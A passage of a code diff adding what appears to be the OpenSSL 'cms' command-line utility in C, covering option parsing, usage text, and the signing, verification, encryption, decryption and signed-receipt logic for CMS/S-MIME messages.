+            flags |= CMS_NO_CONTENT_VERIFY;
+        else if (!strcmp(*args, "-no_attr_verify"))
+            flags |= CMS_NO_ATTR_VERIFY;
+        else if (!strcmp(*args, "-stream"))
+            flags |= CMS_STREAM;
+        else if (!strcmp(*args, "-indef"))
+            flags |= CMS_STREAM;
+        else if (!strcmp(*args, "-noindef"))
+            flags &= ~CMS_STREAM;
+        else if (!strcmp(*args, "-nooldmime"))
+            flags |= CMS_NOOLDMIMETYPE;
+        else if (!strcmp(*args, "-crlfeol"))
+            flags |= CMS_CRLFEOL;
+        else if (!strcmp(*args, "-noout"))
+            noout = 1;
+        else if (!strcmp(*args, "-receipt_request_print"))
+            rr_print = 1;
+        else if (!strcmp(*args, "-receipt_request_all"))
+            rr_allorfirst = 0;
+        else if (!strcmp(*args, "-receipt_request_first"))
+            rr_allorfirst = 1;
+        else if (!strcmp(*args, "-receipt_request_from")) {
+            if (!args[1])
+                goto argerr;
+            args++;
+            if (!rr_from)
+                rr_from = sk_OPENSSL_STRING_new_null();
+            sk_OPENSSL_STRING_push(rr_from, *args);
+        } else if (!strcmp(*args, "-receipt_request_to")) {
+            if (!args[1])
+                goto argerr;
+            args++;
+            if (!rr_to)
+                rr_to = sk_OPENSSL_STRING_new_null();
+            sk_OPENSSL_STRING_push(rr_to, *args);
+        } else if (!strcmp(*args, "-print")) {
+            noout = 1;
+            print = 1;
+        } else if (!strcmp(*args, "-secretkey")) {
+            long ltmp;
+            if (!args[1])
+                goto argerr;
+            args++;
+            secret_key = string_to_hex(*args, &ltmp);
+            if (!secret_key) {
+                BIO_printf(bio_err, "Invalid key %s\n", *args);
+                goto argerr;
+            }
+            secret_keylen = (size_t)ltmp;
+        } else if (!strcmp(*args, "-secretkeyid")) {
+            long ltmp;
+            if (!args[1])
+                goto argerr;
+            args++;
+            secret_keyid = string_to_hex(*args, &ltmp);
+            if (!secret_keyid) {
+                BIO_printf(bio_err, "Invalid id %s\n", *args);
+                goto argerr;
+            }
+            secret_keyidlen = (size_t)ltmp;
+        } else if (!strcmp(*args, "-pwri_password")) {
+            if (!args[1])
+                goto argerr;
+            args++;
+            pwri_pass = (unsigned char *)*args;
+        } else if (!strcmp(*args, "-econtent_type")) {
+            if (!args[1])
+                goto argerr;
+            args++;
+            econtent_type = OBJ_txt2obj(*args, 0);
+            if (!econtent_type) {
+                BIO_printf(bio_err, "Invalid OID %s\n", *args);
+                goto argerr;
+            }
+        } else if (!strcmp(*args, "-rand")) {
+            if (!args[1])
+                goto argerr;
+            args++;
+            inrand = *args;
+            need_rand = 1;
+        }
+# ifndef OPENSSL_NO_ENGINE
+        else if (!strcmp(*args, "-engine")) {
+            if (!args[1])
+                goto argerr;
+            engine = *++args;
+        }
+# endif
+        else if (!strcmp(*args, "-passin")) {
+            if (!args[1])
+                goto argerr;
+            passargin = *++args;
+        } else if (!strcmp(*args, "-to")) {
+            if (!args[1])
+                goto argerr;
+            to = *++args;
+        } else if (!strcmp(*args, "-from")) {
+            if (!args[1])
+                goto argerr;
+            from = *++args;
+        } else if (!strcmp(*args, "-subject")) {
+            if (!args[1])
+                goto argerr;
+            subject = *++args;
+        } else if (!strcmp(*args, "-signer")) {
+            if (!args[1])
+                goto argerr;
+            /* If previous -signer argument add signer to list */
+
+            if (signerfile) {
+                if (!sksigners)
+                    sksigners = sk_OPENSSL_STRING_new_null();
+                sk_OPENSSL_STRING_push(sksigners, signerfile);
+                if (!keyfile)
+                    keyfile = signerfile;
+                if (!skkeys)
+                    skkeys = sk_OPENSSL_STRING_new_null();
+                sk_OPENSSL_STRING_push(skkeys, keyfile);
+                keyfile = NULL;
+            }
+            signerfile = *++args;
+        } else if (!strcmp(*args, "-recip")) {
+            if (!args[1])
+                goto argerr;
+            if (operation == SMIME_ENCRYPT) {
+                if (!encerts)
+                    encerts = sk_X509_new_null();
+                cert = load_cert(bio_err, *++args, FORMAT_PEM,
+                                 NULL, e, "recipient certificate file");
+                if (!cert)
+                    goto end;
+                sk_X509_push(encerts, cert);
+                cert = NULL;
+            } else
+                recipfile = *++args;
+        } else if (!strcmp(*args, "-certsout")) {
+            if (!args[1])
+                goto argerr;
+            certsoutfile = *++args;
+        } else if (!strcmp(*args, "-md")) {
+            if (!args[1])
+                goto argerr;
+            sign_md = EVP_get_digestbyname(*++args);
+            if (sign_md == NULL) {
+                BIO_printf(bio_err, "Unknown digest %s\n", *args);
+                goto argerr;
+            }
+        } else if (!strcmp(*args, "-inkey")) {
+            if (!args[1])
+                goto argerr;
+            /* If previous -inkey arument add signer to list */
+            if (keyfile) {
+                if (!signerfile) {
+                    BIO_puts(bio_err, "Illegal -inkey without -signer\n");
+                    goto argerr;
+                }
+                if (!sksigners)
+                    sksigners = sk_OPENSSL_STRING_new_null();
+                sk_OPENSSL_STRING_push(sksigners, signerfile);
+                signerfile = NULL;
+                if (!skkeys)
+                    skkeys = sk_OPENSSL_STRING_new_null();
+                sk_OPENSSL_STRING_push(skkeys, keyfile);
+            }
+            keyfile = *++args;
+        } else if (!strcmp(*args, "-keyform")) {
+            if (!args[1])
+                goto argerr;
+            keyform = str2fmt(*++args);
+        } else if (!strcmp(*args, "-keyopt")) {
+            int keyidx = -1;
+            if (!args[1])
+                goto argerr;
+            if (operation == SMIME_ENCRYPT) {
+                if (encerts)
+                    keyidx += sk_X509_num(encerts);
+            } else {
+                if (keyfile || signerfile)
+                    keyidx++;
+                if (skkeys)
+                    keyidx += sk_OPENSSL_STRING_num(skkeys);
+            }
+            if (keyidx < 0) {
+                BIO_printf(bio_err, "No key specified\n");
+                goto argerr;
+            }
+            if (key_param == NULL || key_param->idx != keyidx) {
+                cms_key_param *nparam;
+                nparam = OPENSSL_malloc(sizeof(cms_key_param));
+                nparam->idx = keyidx;
+                nparam->param = sk_OPENSSL_STRING_new_null();
+                nparam->next = NULL;
+                if (key_first == NULL)
+                    key_first = nparam;
+                else
+                    key_param->next = nparam;
+                key_param = nparam;
+            }
+            sk_OPENSSL_STRING_push(key_param->param, *++args);
+        } else if (!strcmp(*args, "-rctform")) {
+            if (!args[1])
+                goto argerr;
+            rctformat = str2fmt(*++args);
+        } else if (!strcmp(*args, "-certfile")) {
+            if (!args[1])
+                goto argerr;
+            certfile = *++args;
+        } else if (!strcmp(*args, "-CAfile")) {
+            if (!args[1])
+                goto argerr;
+            CAfile = *++args;
+        } else if (!strcmp(*args, "-CApath")) {
+            if (!args[1])
+                goto argerr;
+            CApath = *++args;
+        } else if (!strcmp(*args, "-in")) {
+            if (!args[1])
+                goto argerr;
+            infile = *++args;
+        } else if (!strcmp(*args, "-inform")) {
+            if (!args[1])
+                goto argerr;
+            informat = str2fmt(*++args);
+        } else if (!strcmp(*args, "-outform")) {
+            if (!args[1])
+                goto argerr;
+            outformat = str2fmt(*++args);
+        } else if (!strcmp(*args, "-out")) {
+            if (!args[1])
+                goto argerr;
+            outfile = *++args;
+        } else if (!strcmp(*args, "-content")) {
+            if (!args[1])
+                goto argerr;
+            contfile = *++args;
+        } else if (args_verify(&args, NULL, &badarg, bio_err, &vpm))
+            continue;
+        else if ((cipher = EVP_get_cipherbyname(*args + 1)) == NULL)
+            badarg = 1;
+        args++;
+    }
+
+    if (((rr_allorfirst != -1) || rr_from) && !rr_to) {
+        BIO_puts(bio_err, "No Signed Receipts Recipients\n");
+        goto argerr;
+    }
+
+    if (!(operation & SMIME_SIGNERS) && (rr_to || rr_from)) {
+        BIO_puts(bio_err, "Signed receipts only allowed with -sign\n");
+        goto argerr;
+    }
+    if (!(operation & SMIME_SIGNERS) && (skkeys || sksigners)) {
+        BIO_puts(bio_err, "Multiple signers or keys not allowed\n");
+        goto argerr;
+    }
+
+    if (operation & SMIME_SIGNERS) {
+        if (keyfile && !signerfile) {
+            BIO_puts(bio_err, "Illegal -inkey without -signer\n");
+            goto argerr;
+        }
+        /* Check to see if any final signer needs to be appended */
+        if (signerfile) {
+            if (!sksigners)
+                sksigners = sk_OPENSSL_STRING_new_null();
+            sk_OPENSSL_STRING_push(sksigners, signerfile);
+            if (!skkeys)
+                skkeys = sk_OPENSSL_STRING_new_null();
+            if (!keyfile)
+                keyfile = signerfile;
+            sk_OPENSSL_STRING_push(skkeys, keyfile);
+        }
+        if (!sksigners) {
+            BIO_printf(bio_err, "No signer certificate specified\n");
+            badarg = 1;
+        }
+        signerfile = NULL;
+        keyfile = NULL;
+        need_rand = 1;
+    }
+
+    else if (operation == SMIME_DECRYPT) {
+        if (!recipfile && !keyfile && !secret_key && !pwri_pass) {
+            BIO_printf(bio_err,
+                       "No recipient certificate or key specified\n");
+            badarg = 1;
+        }
+    } else if (operation == SMIME_ENCRYPT) {
+        if (!*args && !secret_key && !pwri_pass && !encerts) {
+            BIO_printf(bio_err, "No recipient(s) certificate(s) specified\n");
+            badarg = 1;
+        }
+        need_rand = 1;
+    } else if (!operation)
+        badarg = 1;
+
+    if (badarg) {
+ argerr:
+        BIO_printf(bio_err, "Usage cms [options] cert.pem ...\n");
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, "-encrypt       encrypt message\n");
+        BIO_printf(bio_err, "-decrypt       decrypt encrypted message\n");
+        BIO_printf(bio_err, "-sign          sign message\n");
+        BIO_printf(bio_err, "-verify        verify signed message\n");
+        BIO_printf(bio_err, "-cmsout        output CMS structure\n");
+# ifndef OPENSSL_NO_DES
+        BIO_printf(bio_err, "-des3          encrypt with triple DES\n");
+        BIO_printf(bio_err, "-des           encrypt with DES\n");
+# endif
+# ifndef OPENSSL_NO_SEED
+        BIO_printf(bio_err, "-seed          encrypt with SEED\n");
+# endif
+# ifndef OPENSSL_NO_RC2
+        BIO_printf(bio_err, "-rc2-40        encrypt with RC2-40 (default)\n");
+        BIO_printf(bio_err, "-rc2-64        encrypt with RC2-64\n");
+        BIO_printf(bio_err, "-rc2-128       encrypt with RC2-128\n");
+# endif
+# ifndef OPENSSL_NO_AES
+        BIO_printf(bio_err, "-aes128, -aes192, -aes256\n");
+        BIO_printf(bio_err,
+                   "               encrypt PEM output with cbc aes\n");
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+        BIO_printf(bio_err, "-camellia128, -camellia192, -camellia256\n");
+        BIO_printf(bio_err,
+                   "               encrypt PEM output with cbc camellia\n");
+# endif
+        BIO_printf(bio_err,
+                   "-nointern      don't search certificates in message for signer\n");
+        BIO_printf(bio_err,
+                   "-nosigs        don't verify message signature\n");
+        BIO_printf(bio_err,
+                   "-noverify      don't verify signers certificate\n");
+        BIO_printf(bio_err,
+                   "-nocerts       don't include signers certificate when signing\n");
+        BIO_printf(bio_err, "-nodetach      use opaque signing\n");
+        BIO_printf(bio_err,
+                   "-noattr        don't include any signed attributes\n");
+        BIO_printf(bio_err,
+                   "-binary        don't translate message to text\n");
+        BIO_printf(bio_err, "-certfile file other certificates file\n");
+        BIO_printf(bio_err, "-certsout file certificate output file\n");
+        BIO_printf(bio_err, "-signer file   signer certificate file\n");
+        BIO_printf(bio_err,
+                   "-recip  file   recipient certificate file for decryption\n");
+        BIO_printf(bio_err, "-keyid         use subject key identifier\n");
+        BIO_printf(bio_err, "-in file       input file\n");
+        BIO_printf(bio_err,
+                   "-inform arg    input format SMIME (default), PEM or DER\n");
+        BIO_printf(bio_err,
+                   "-inkey file    input private key (if not signer or recipient)\n");
+        BIO_printf(bio_err,
+                   "-keyform arg   input private key format (PEM or ENGINE)\n");
+        BIO_printf(bio_err, "-keyopt nm:v   set public key parameters\n");
+        BIO_printf(bio_err, "-out file      output file\n");
+        BIO_printf(bio_err,
+                   "-outform arg   output format SMIME (default), PEM or DER\n");
+        BIO_printf(bio_err,
+                   "-content file  supply or override content for detached signature\n");
+        BIO_printf(bio_err, "-to addr       to address\n");
+        BIO_printf(bio_err, "-from ad       from address\n");
+        BIO_printf(bio_err, "-subject s     subject\n");
+        BIO_printf(bio_err,
+                   "-text          include or delete text MIME headers\n");
+        BIO_printf(bio_err,
+                   "-CApath dir    trusted certificates directory\n");
+        BIO_printf(bio_err, "-CAfile file   trusted certificates file\n");
+        BIO_printf(bio_err,
+                   "-crl_check     check revocation status of signer's certificate using CRLs\n");
+        BIO_printf(bio_err,
+                   "-crl_check_all check revocation status of signer's certificate chain using CRLs\n");
+# ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   "-engine e      use engine e, possibly a hardware device.\n");
+# endif
+        BIO_printf(bio_err, "-passin arg    input file pass phrase source\n");
+        BIO_printf(bio_err, "-rand file%cfile%c...\n", LIST_SEPARATOR_CHAR,
+                   LIST_SEPARATOR_CHAR);
+        BIO_printf(bio_err,
+                   "               load the file (or the files in the directory) into\n");
+        BIO_printf(bio_err, "               the random number generator\n");
+        BIO_printf(bio_err,
+                   "cert.pem       recipient certificate(s) for encryption\n");
+        goto end;
+    }
+# ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+# endif
+
+    if (!app_passwd(bio_err, passargin, NULL, &passin, NULL)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto end;
+    }
+
+    if (need_rand) {
+        app_RAND_load_file(NULL, bio_err, (inrand != NULL));
+        if (inrand != NULL)
+            BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                       app_RAND_load_files(inrand));
+    }
+
+    ret = 2;
+
+    if (!(operation & SMIME_SIGNERS))
+        flags &= ~CMS_DETACHED;
+
+    if (operation & SMIME_OP) {
+        if (outformat == FORMAT_ASN1)
+            outmode = "wb";
+    } else {
+        if (flags & CMS_BINARY)
+            outmode = "wb";
+    }
+
+    if (operation & SMIME_IP) {
+        if (informat == FORMAT_ASN1)
+            inmode = "rb";
+    } else {
+        if (flags & CMS_BINARY)
+            inmode = "rb";
+    }
+
+    if (operation == SMIME_ENCRYPT) {
+        if (!cipher) {
+# ifndef OPENSSL_NO_DES
+            cipher = EVP_des_ede3_cbc();
+# else
+            BIO_printf(bio_err, "No cipher selected\n");
+            goto end;
+# endif
+        }
+
+        if (secret_key && !secret_keyid) {
+            BIO_printf(bio_err, "No secret key id\n");
+            goto end;
+        }
+
+        if (*args && !encerts)
+            encerts = sk_X509_new_null();
+        while (*args) {
+            if (!(cert = load_cert(bio_err, *args, FORMAT_PEM,
+                                   NULL, e, "recipient certificate file")))
+                goto end;
+            sk_X509_push(encerts, cert);
+            cert = NULL;
+            args++;
+        }
+    }
+
+    if (certfile) {
+        if (!(other = load_certs(bio_err, certfile, FORMAT_PEM, NULL,
+                                 e, "certificate file"))) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (recipfile && (operation == SMIME_DECRYPT)) {
+        if (!(recip = load_cert(bio_err, recipfile, FORMAT_PEM, NULL,
+                                e, "recipient certificate file"))) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (operation == SMIME_SIGN_RECEIPT) {
+        if (!(signer = load_cert(bio_err, signerfile, FORMAT_PEM, NULL,
+                                 e, "receipt signer certificate file"))) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (operation == SMIME_DECRYPT) {
+        if (!keyfile)
+            keyfile = recipfile;
+    } else if ((operation == SMIME_SIGN) || (operation == SMIME_SIGN_RECEIPT)) {
+        if (!keyfile)
+            keyfile = signerfile;
+    } else
+        keyfile = NULL;
+
+    if (keyfile) {
+        key = load_key(bio_err, keyfile, keyform, 0, passin, e,
+                       "signing key file");
+        if (!key)
+            goto end;
+    }
+
+    if (infile) {
+        if (!(in = BIO_new_file(infile, inmode))) {
+            BIO_printf(bio_err, "Can't open input file %s\n", infile);
+            goto end;
+        }
+    } else
+        in = BIO_new_fp(stdin, BIO_NOCLOSE);
+
+    if (operation & SMIME_IP) {
+        if (informat == FORMAT_SMIME)
+            cms = SMIME_read_CMS(in, &indata);
+        else if (informat == FORMAT_PEM)
+            cms = PEM_read_bio_CMS(in, NULL, NULL, NULL);
+        else if (informat == FORMAT_ASN1)
+            cms = d2i_CMS_bio(in, NULL);
+        else {
+            BIO_printf(bio_err, "Bad input format for CMS file\n");
+            goto end;
+        }
+
+        if (!cms) {
+            BIO_printf(bio_err, "Error reading S/MIME message\n");
+            goto end;
+        }
+        if (contfile) {
+            BIO_free(indata);
+            if (!(indata = BIO_new_file(contfile, "rb"))) {
+                BIO_printf(bio_err, "Can't read content file %s\n", contfile);
+                goto end;
+            }
+        }
+        if (certsoutfile) {
+            STACK_OF(X509) *allcerts;
+            allcerts = CMS_get1_certs(cms);
+            if (!save_certs(certsoutfile, allcerts)) {
+                BIO_printf(bio_err,
+                           "Error writing certs to %s\n", certsoutfile);
+                ret = 5;
+                goto end;
+            }
+            sk_X509_pop_free(allcerts, X509_free);
+        }
+    }
+
+    if (rctfile) {
+        char *rctmode = (rctformat == FORMAT_ASN1) ? "rb" : "r";
+        if (!(rctin = BIO_new_file(rctfile, rctmode))) {
+            BIO_printf(bio_err, "Can't open receipt file %s\n", rctfile);
+            goto end;
+        }
+
+        if (rctformat == FORMAT_SMIME)
+            rcms = SMIME_read_CMS(rctin, NULL);
+        else if (rctformat == FORMAT_PEM)
+            rcms = PEM_read_bio_CMS(rctin, NULL, NULL, NULL);
+        else if (rctformat == FORMAT_ASN1)
+            rcms = d2i_CMS_bio(rctin, NULL);
+        else {
+            BIO_printf(bio_err, "Bad input format for receipt\n");
+            goto end;
+        }
+
+        if (!rcms) {
+            BIO_printf(bio_err, "Error reading receipt\n");
+            goto end;
+        }
+    }
+
+    if (outfile) {
+        if (!(out = BIO_new_file(outfile, outmode))) {
+            BIO_printf(bio_err, "Can't open output file %s\n", outfile);
+            goto end;
+        }
+    } else {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    }
+
+    if ((operation == SMIME_VERIFY) || (operation == SMIME_VERIFY_RECEIPT)) {
+        if (!(store = setup_verify(bio_err, CAfile, CApath)))
+            goto end;
+        X509_STORE_set_verify_cb(store, cms_cb);
+        if (vpm)
+            X509_STORE_set1_param(store, vpm);
+    }
+
+    ret = 3;
+
+    if (operation == SMIME_DATA_CREATE) {
+        cms = CMS_data_create(in, flags);
+    } else if (operation == SMIME_DIGEST_CREATE) {
+        cms = CMS_digest_create(in, sign_md, flags);
+    } else if (operation == SMIME_COMPRESS) {
+        cms = CMS_compress(in, -1, flags);
+    } else if (operation == SMIME_ENCRYPT) {
+        int i;
+        flags |= CMS_PARTIAL;
+        cms = CMS_encrypt(NULL, in, cipher, flags);
+        if (!cms)
+            goto end;
+        for (i = 0; i < sk_X509_num(encerts); i++) {
+            CMS_RecipientInfo *ri;
+            cms_key_param *kparam;
+            int tflags = flags;
+            X509 *x = sk_X509_value(encerts, i);
+            for (kparam = key_first; kparam; kparam = kparam->next) {
+                if (kparam->idx == i) {
+                    tflags |= CMS_KEY_PARAM;
+                    break;
+                }
+            }
+            ri = CMS_add1_recipient_cert(cms, x, tflags);
+            if (!ri)
+                goto end;
+            if (kparam) {
+                EVP_PKEY_CTX *pctx;
+                pctx = CMS_RecipientInfo_get0_pkey_ctx(ri);
+                if (!cms_set_pkey_param(pctx, kparam->param))
+                    goto end;
+            }
+            if (CMS_RecipientInfo_type(ri) == CMS_RECIPINFO_AGREE
+                && wrap_cipher) {
+                EVP_CIPHER_CTX *wctx;
+                wctx = CMS_RecipientInfo_kari_get0_ctx(ri);
+                EVP_EncryptInit_ex(wctx, wrap_cipher, NULL, NULL, NULL);
+            }
+        }
+
+        if (secret_key) {
+            if (!CMS_add0_recipient_key(cms, NID_undef,
+                                        secret_key, secret_keylen,
+                                        secret_keyid, secret_keyidlen,
+                                        NULL, NULL, NULL))
+                goto end;
+            /* NULL these because call absorbs them */
+            secret_key = NULL;
+            secret_keyid = NULL;
+        }
+        if (pwri_pass) {
+            pwri_tmp = (unsigned char *)BUF_strdup((char *)pwri_pass);
+            if (!pwri_tmp)
+                goto end;
+            if (!CMS_add0_recipient_password(cms,
+                                             -1, NID_undef, NID_undef,
+                                             pwri_tmp, -1, NULL))
+                goto end;
+            pwri_tmp = NULL;
+        }
+        if (!(flags & CMS_STREAM)) {
+            if (!CMS_final(cms, in, NULL, flags))
+                goto end;
+        }
+    } else if (operation == SMIME_ENCRYPTED_ENCRYPT) {
+        cms = CMS_EncryptedData_encrypt(in, cipher,
+                                        secret_key, secret_keylen, flags);
+
+    } else if (operation == SMIME_SIGN_RECEIPT) {
+        CMS_ContentInfo *srcms = NULL;
+        STACK_OF(CMS_SignerInfo) *sis;
+        CMS_SignerInfo *si;
+        sis = CMS_get0_SignerInfos(cms);
+        if (!sis)
+            goto end;
+        si = sk_CMS_SignerInfo_value(sis, 0);
+        srcms = CMS_sign_receipt(si, signer, key, other, flags);
+        if (!srcms)
+            goto end;
+        CMS_ContentInfo_free(cms);
+        cms = srcms;
+    } else if (operation & SMIME_SIGNERS) {
+        int i;
+        /*
+         * If detached data content we enable streaming if S/MIME output
+         * format.
+         */
+        if (operation == SMIME_SIGN) {
+
+            if (flags & CMS_DETACHED) {
+                if (outformat == FORMAT_SMIME)
+                    flags |= CMS_STREAM;
+            }
+            flags |= CMS_PARTIAL;
+            cms = CMS_sign(NULL, NULL, other, in, flags);
+            if (!cms)
+                goto end;
+            if (econtent_type)
+                CMS_set1_eContentType(cms, econtent_type);
+
+            if (rr_to) {
+                rr = make_receipt_request(rr_to, rr_allorfirst, rr_from);
+                if (!rr) {
+                    BIO_puts(bio_err,
+                             "Signed Receipt Request Creation Error\n");
+                    goto end;
+                }
+            }
+        } else
+            flags |= CMS_REUSE_DIGEST;
+        for (i = 0; i < sk_OPENSSL_STRING_num(sksigners); i++) {
+            CMS_SignerInfo *si;
+            cms_key_param *kparam;
+            int tflags = flags;
+            signerfile = sk_OPENSSL_STRING_value(sksigners, i);
+            keyfile = sk_OPENSSL_STRING_value(skkeys, i);
+
+            signer = load_cert(bio_err, signerfile, FORMAT_PEM, NULL,
+                               e, "signer certificate");
+            if (!signer)
+                goto end;
+            key = load_key(bio_err, keyfile, keyform, 0, passin, e,
+                           "signing key file");
+            if (!key)
+                goto end;
+            for (kparam = key_first; kparam; kparam = kparam->next) {
+                if (kparam->idx == i) {
+                    tflags |= CMS_KEY_PARAM;
+                    break;
+                }
+            }
+            si = CMS_add1_signer(cms, signer, key, sign_md, tflags);
+            if (!si)
+                goto end;
+            if (kparam) {
+                EVP_PKEY_CTX *pctx;
+                pctx = CMS_SignerInfo_get0_pkey_ctx(si);
+                if (!cms_set_pkey_param(pctx, kparam->param))
+                    goto end;
+            }
+            if (rr && !CMS_add1_ReceiptRequest(si, rr))
+                goto end;
+            X509_free(signer);
+            signer = NULL;
+            EVP_PKEY_free(key);
+            key = NULL;
+        }
+        /* If not streaming or resigning finalize structure */
+        if ((operation == SMIME_SIGN) && !(flags & CMS_STREAM)) {
+            if (!CMS_final(cms, in, NULL, flags))
+                goto end;
+        }
+    }
+
+    if (!cms) {
+        BIO_printf(bio_err, "Error creating CMS structure\n");
+        goto end;
+    }
+
+    ret = 4;
+    if (operation == SMIME_DECRYPT) {
+        if (flags & CMS_DEBUG_DECRYPT)
+            CMS_decrypt(cms, NULL, NULL, NULL, NULL, flags);
+
+        if (secret_key) {
+            if (!CMS_decrypt_set1_key(cms,
+                                      secret_key, secret_keylen,
+                                      secret_keyid, secret_keyidlen)) {
+                BIO_puts(bio_err, "Error decrypting CMS using secret key\n");
+                goto end;
+            }
+        }
+
+        if (key) {
+            if (!CMS_decrypt_set1_pkey(cms, key, recip)) {
+                BIO_puts(bio_err, "Error decrypting CMS using private key\n");
+                goto end;
+            }
+        }
+
+        if (pwri_pass) {
+            if (!CMS_decrypt_set1_password(cms, pwri_pass, -1)) {
+                BIO_puts(bio_err, "Error decrypting CMS using password\n");
+                goto end;
+            }
+        }
+
+        if (!CMS_decrypt(cms, NULL, NULL, indata, out, flags)) {
+            BIO_printf(bio_err, "Error decrypting CMS structure\n");
+            goto end;
+        }
+    } else if (operation == SMIME_DATAOUT) {
+        if (!CMS_data(cms, out, flags))
+            goto end;
+    } else if (operation == SMIME_UNCOMPRESS) {
+        if (!CMS_uncompress(cms, indata, out, flags))
+            goto end;
+    } else if (operation == SMIME_DIGEST_VERIFY) {
+        if (CMS_digest_verify(cms, indata, out, flags) > 0)
+            BIO_printf(bio_err, "Verification successful\n");
+        else {
+            BIO_printf(bio_err, "Verification failure\n");
+            goto end;
+        }
+    } else if (operation == SMIME_ENCRYPTED_DECRYPT) {
+        if (!CMS_EncryptedData_decrypt(cms, secret_key, secret_keylen,
+                                       indata, out, flags))
+            goto end;
+    } else if (operation == SMIME_VERIFY) {
+        if (CMS_verify(cms, other, store, indata, out, flags) > 0)
+            BIO_printf(bio_err, "Verification successful\n");
+        else {
+            BIO_printf(bio_err, "Verification failure\n");
+            if (verify_retcode)
+                ret = verify_err + 32;
+            goto end;
+        }
+        if (signerfile) {
+            STACK_OF(X509) *signers;
+            signers = CMS_get0_signers(cms);
+            if (!save_certs(signerfile, signers)) {
+                BIO_printf(bio_err,
+                           "Error writing signers to %s\n", signerfile);
+                ret = 5;
+                goto end;
+            }
+            sk_X509_free(signers);
+        }
+        if (rr_print)
+            receipt_request_print(bio_err, cms);
+
+    } else if (operation == SMIME_VERIFY_RECEIPT) {
+        if (CMS_verify_receipt(rcms, cms, other, store, flags) > 0)
+            BIO_printf(bio_err, "Verification successful\n");
+        else {
+            BIO_printf(bio_err, "Verification failure\n");
+            goto end;
+        }
+    } else {
+        if (noout) {
+            if (print)
+                CMS_ContentInfo_print_ctx(out, cms, 0, NULL);
+        } else if (outformat == FORMAT_SMIME) {
+            if (to)
+                BIO_printf(out, "To: %s\n", to);
+            if (from)
+                BIO_printf(out, "From: %s\n", from);
+            if (subject)
+                BIO_printf(out, "Subject: %s\n", subject);
+            if (operation == SMIME_RESIGN)
+                ret = SMIME_write_CMS(out, cms, indata, flags);
+            else
+                ret = SMIME_write_CMS(out, cms, in, flags);
+        } else if (outformat == FORMAT_PEM)
+            ret = PEM_write_bio_CMS_stream(out, cms, in, flags);
+        else if (outformat == FORMAT_ASN1)
+            ret = i2d_CMS_bio_stream(out, cms, in, flags);
+        else {
+            BIO_printf(bio_err, "Bad output format for CMS file\n");
+            goto end;
+        }
+        if (ret <= 0) {
+            ret = 6;
+            goto end;
+        }
+    }
+    ret = 0;
+ end:
+    if (ret)
+        ERR_print_errors(bio_err);
+    if (need_rand)
+        app_RAND_write_file(NULL, bio_err);
+    sk_X509_pop_free(encerts, X509_free);
+    sk_X509_pop_free(other, X509_free);
+    if (vpm)
+        X509_VERIFY_PARAM_free(vpm);
+    if (sksigners)
+        sk_OPENSSL_STRING_free(sksigners);
+    if (skkeys)
+        sk_OPENSSL_STRING_free(skkeys);
+    if (secret_key)
+        OPENSSL_free(secret_key);
+    if (secret_keyid)
+        OPENSSL_free(secret_keyid);
+    if (pwri_tmp)
+        OPENSSL_free(pwri_tmp);
+    if (econtent_type)
+        ASN1_OBJECT_free(econtent_type);
+    if (rr)
+        CMS_ReceiptRequest_free(rr);
+    if (rr_to)
+        sk_OPENSSL_STRING_free(rr_to);
+    if (rr_from)
+        sk_OPENSSL_STRING_free(rr_from);
+    for (key_param = key_first; key_param;) {
+        cms_key_param *tparam;
+        sk_OPENSSL_STRING_free(key_param->param);
+        tparam = key_param->next;
+        OPENSSL_free(key_param);
+        key_param = tparam;
+    }
+    X509_STORE_free(store);
+    X509_free(cert);
+    X509_free(recip);
+    X509_free(signer);
+    EVP_PKEY_free(key);
+    CMS_ContentInfo_free(cms);
+    CMS_ContentInfo_free(rcms);
+    BIO_free(rctin);
+    BIO_free(in);
+    BIO_free(indata);
+    BIO_free_all(out);
+    if (passin)
+        OPENSSL_free(passin);
+    return (ret);
+}
+
+static int save_certs(char *signerfile, STACK_OF(X509) *signers)
+{
+    int i;
+    BIO *tmp;
+    if (!signerfile)
+        return 1;
+    tmp = BIO_new_file(signerfile, "w");
+    if (!tmp)
+        return 0;
+    for (i = 0; i < sk_X509_num(signers); i++)
+        PEM_write_bio_X509(tmp, sk_X509_value(signers, i));
+    BIO_free(tmp);
+    return 1;
+}
+
+/* Minimal callback just to output policy info (if any) */
+
+static int cms_cb(int ok, X509_STORE_CTX *ctx)
+{
+    int error;
+
+    error = X509_STORE_CTX_get_error(ctx);
+
+    verify_err = error;
+
+    if ((error != X509_V_ERR_NO_EXPLICIT_POLICY)
+        && ((error != X509_V_OK) || (ok != 2)))
+        return ok;
+
+    policies_print(NULL, ctx);
+
+    return ok;
+
+}
+
+static void gnames_stack_print(BIO *out, STACK_OF(GENERAL_NAMES) *gns)
+{
+    STACK_OF(GENERAL_NAME) *gens;
+    GENERAL_NAME *gen;
+    int i, j;
+    for (i = 0; i < sk_GENERAL_NAMES_num(gns); i++) {
+        gens = sk_GENERAL_NAMES_value(gns, i);
+        for (j = 0; j < sk_GENERAL_NAME_num(gens); j++) {
+            gen = sk_GENERAL_NAME_value(gens, j);
+            BIO_puts(out, "    ");
+            GENERAL_NAME_print(out, gen);
+            BIO_puts(out, "\n");
+        }
+    }
+    return;
+}
+
+static void receipt_request_print(BIO *out, CMS_ContentInfo *cms)
+{
+    STACK_OF(CMS_SignerInfo) *sis;
+    CMS_SignerInfo *si;
+    CMS_ReceiptRequest *rr;
+    int allorfirst;
+    STACK_OF(GENERAL_NAMES) *rto, *rlist;
+    ASN1_STRING *scid;
+    int i, rv;
+    sis = CMS_get0_SignerInfos(cms);
+    for (i = 0; i < sk_CMS_SignerInfo_num(sis); i++) {
+        si = sk_CMS_SignerInfo_value(sis, i);
+        rv = CMS_get1_ReceiptRequest(si, &rr);
